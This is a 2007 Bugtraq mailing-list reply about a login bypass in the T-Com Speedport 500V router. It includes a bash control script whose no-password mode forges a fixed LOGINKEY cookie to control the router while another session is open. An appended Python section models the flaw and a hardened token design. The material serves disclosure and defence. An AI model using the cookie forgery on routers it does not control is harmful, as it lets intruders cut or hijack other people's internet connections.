Date: 16 Feb 2007 10:26:57 -0000
From: kissme@...ke7.net
To: bugtraq@...urityfocus.com
Subject: Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass

Hi,

I tried to use the security hole to speed up my control script for the
Speedport 500V Firmware 1.31 under Linux. The goal was to spare the login
request, which takes many seconds. But it does not work as expected.
The router remembers the login state. Access without password can only
be gained when the router (correctly) thinks I am still logged in
from a previous session.

Thus, it seems to me that the security hole is less dangerous - just
always log out from the router. But I don't know whether all remote
control programs perform such logouts, and I did not try to access the
router from different computers, so I don't know whether the router
remembers _which_ computer is logged in.

If you want to reproduce my effects, do the following:

Save the script below to a file named Speedport500V.sh. Edit it, set
the correct ADDR and set DO_LOGIN_LOGOUT=0 (thereby the password is not
required).

Now open a browser and log in to the router.

Then, in a shell, say:
  ./Speedport500V.sh status

The output should be 'connected' or 'disconnected' depending on the
connection state. If the output is 'unknown' something went wrong.

Now do one of the following:
 - Go back to the browser and log out from the router.
 - Wait for a long time (session time-out).
 - Switch the router off and on.

Then try the above command again. It should say 'unknown' now, which
means that the access without password has been denied.

Now edit the script again, set the correct PASSWORD and set
DO_LOGIN_LOGOUT=1. The script should always work now. Open a browser
and log in to the router. Call the script once. Now try to navigate in
the open browser session - it will ask for the password, because the
script call has closed the session.


Here comes the script:

#!/bin/bash
# Control script for the Speedport 500V (firmware 1.31).
# Needs bash (not plain sh): it uses (( )), [[ ]] and echo -e.

ADDR="192.168.2.1"
PASSWORD="0000"
DO_LOGIN_LOGOUT=1

if (( $# != 1 )) ; then
  echo "Usage: $0 connect|disconnect|status"
  exit 1
fi

# Temporary files: created with mktemp rather than predictable $$-based
# names, so another local user cannot pre-create or symlink them.
COOKIE_FILE="$(mktemp /tmp/Speedport500V.cookie.XXXXXX)"
STATUS_FILE="$(mktemp /tmp/Speedport500V.status.XXXXXX)"
RC=0

# Login: either POST the password and keep the session cookie the router
# returns, or write a cookie file by hand containing the fixed LOGINKEY
# value (one tab-separated line in Netscape cookie-file format).
if [[ "$DO_LOGIN_LOGOUT" == "1" ]] ; then
  wget \
    -q \
    --save-cookies "$COOKIE_FILE" \
    --keep-session-cookies \
    -O /dev/null \
    --post-data "P1=$PASSWORD" \
    "http://$ADDR/start.login"
else
  echo -e "$ADDR\tFALSE\t/\tFALSE\t0\tLOGINKEY\tTECOM" > "$COOKIE_FILE"
fi

# Request
case "$1" in
  (connect)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE" \
      -O /dev/null \
      "http://$ADDR/pppctl.cmd?action=1"
  ;;
  (disconnect)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE" \
      -O /dev/null \
      "http://$ADDR/pppctl.cmd?action=0"
  ;;
  (status)
    # The status page is German: 'Getrennt' = disconnected, 'Verbunden' = connected.
    # Anything else (e.g. the login page because the session was rejected) is 'unknown'.
    wget \
      -q \
      --load-cookies "$COOKIE_FILE" \
      -O "$STATUS_FILE" \
      "http://$ADDR/hcti_statoview.htm"
    if grep -q "var wan_status = 'Getrennt';" "$STATUS_FILE" ; then
      echo disconnected
    elif grep -q "var wan_status = 'Verbunden';" "$STATUS_FILE" ; then
      echo connected
    else
      echo unknown
    fi
  ;;
  (*)
    echo "ERROR: illegal argument" >&2
    RC=1
  ;;
esac

# Logout (only if we logged in ourselves), then clean up the temp files
if [[ "$DO_LOGIN_LOGOUT" == "1" ]] ; then
  wget \
    -q \
    --load-cookies "$COOKIE_FILE" \
    -O /dev/null \
    "http://$ADDR/logout.cmd"
fi
rm -f "$COOKIE_FILE" "$STATUS_FILE"
exit "$RC"
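The observation above (a constant cookie value is accepted only while someone is logged in) can be modelled as a single global login flag; as an added example that is not part of the original post and not the router's firmware code, here is that model next to a hardened variant that issues a random per-login token. The class and function names, and the internals of both routers, are assumptions.

```python
import secrets

# Constructed model of the behaviour reported in the post: the router keeps one
# global "logged in" state and the cookie value it checks is a fixed string.
STATIC_COOKIE = "TECOM"


class GlobalFlagRouter:
    """Vulnerable model (assumed): one global login flag, constant cookie value."""

    def __init__(self, password):
        self.password = password
        self.logged_in = False

    def login(self, password):
        if password == self.password:
            self.logged_in = True
            return {"LOGINKEY": STATIC_COOKIE}
        return None

    def logout(self):
        self.logged_in = False

    def authorized(self, cookies):
        # Any client presenting the well-known value passes while the flag is set.
        return self.logged_in and cookies.get("LOGINKEY") == STATIC_COOKIE


class TokenRouter:
    """Hardened model: a fresh random token per login; the cookie must match it."""

    def __init__(self, password):
        self.password = password
        self.token = None

    def login(self, password):
        if password == self.password:
            self.token = secrets.token_hex(16)   # unguessable, per session
            return {"LOGINKEY": self.token}
        return None

    def logout(self):
        self.token = None

    def authorized(self, cookies):
        key = cookies.get("LOGINKEY")
        return self.token is not None and key is not None \
            and secrets.compare_digest(key, self.token)


def forged_cookie_accepted(router, password="0000"):
    """Replay the post's experiment: a browser logs in, a second client presents
    only the fixed cookie value, then the browser logs out and it tries again.
    Returns (accepted_during_session, accepted_after_logout)."""
    forged = {"LOGINKEY": STATIC_COOKIE}
    router.login(password)
    during = router.authorized(forged)
    router.logout()
    after = router.authorized(forged)
    return during, after
```

With the global-flag model the forged cookie is accepted exactly while the browser session is open, which is the behaviour the post describes; with a per-login random token it is never accepted, while the cookie actually issued at login still works until logout.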
